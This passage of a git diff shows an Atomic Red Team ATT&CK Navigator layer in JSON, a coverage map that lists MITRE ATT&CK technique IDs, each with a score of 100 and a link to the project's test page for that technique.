.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491
.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techn
iqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546
.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/red
canaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comm
ent":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atom
ic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.m